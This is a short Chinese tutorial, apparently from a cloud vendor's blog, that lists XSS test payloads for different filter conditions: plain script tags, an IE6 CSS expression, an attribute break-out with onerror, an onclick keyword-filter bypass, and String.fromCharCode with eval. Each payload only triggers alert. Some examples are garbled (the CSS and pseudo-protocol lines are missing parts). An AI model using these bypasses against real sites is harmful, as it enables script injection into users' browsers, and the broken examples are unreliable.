xss的小测试是怎样进行的

小编今天带大家了解xss的小测试是怎样进行的，文中知识点介绍的非常详细。觉得有帮助的朋友可以跟着小编一起浏览文章的内容，希望能够帮助更多想解决这个问题的朋友找到问题的答案，下面跟着小编一起深入学习“xss的小测试是怎样进行的”的知识吧。

• 无安全方面的限制，直接使用

<script>alert(/xss/);</script>

• 限制条件：只能使用CSS，不允许使用html标签

我们知道利用expression可以用来构造XSS，但是只能在IE下面测试，所以下面的测试请在IE6中执行。

body {
black;
xss:alert(/xss/));/*IE6下测试*/
}

• 限制条件：对HTML进行了转义，Image标签可用。

测试输入的字符会被插入到src地址中，那么可以使用伪协议来绕过。

直接输入

alert( /xss/);

或者你也可以使用事件来绕过，注意闭合语句即可，如下：

1" onerror=alert(/xss/); var a="1

• 限制条件：使用了关键字过滤。

我测试了一下，大部分都过滤了，有部分未过滤，经测试script/onerror过滤了，但是onclick未过滤，使用onclick事件绕过

<img src=# onclick=alert(/xss/);>

• 限制条件：使用addslashes对特征字符进行了转义

也就是说我们的XSS语句中不能出现单引号，双引号等等特征字符。

直接使用

<script>alert(/xss/);</script>

即可绕过

或者使用String.fromCharCode方法，如下：

<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>

感谢大家的阅读，以上就是“xss的小测试是怎样进行的”的全部内容了，学会的朋友赶紧操作起来吧。相信亿速云小编一定会给大家带来更优质的文章。谢谢大家对亿速云网站的支持！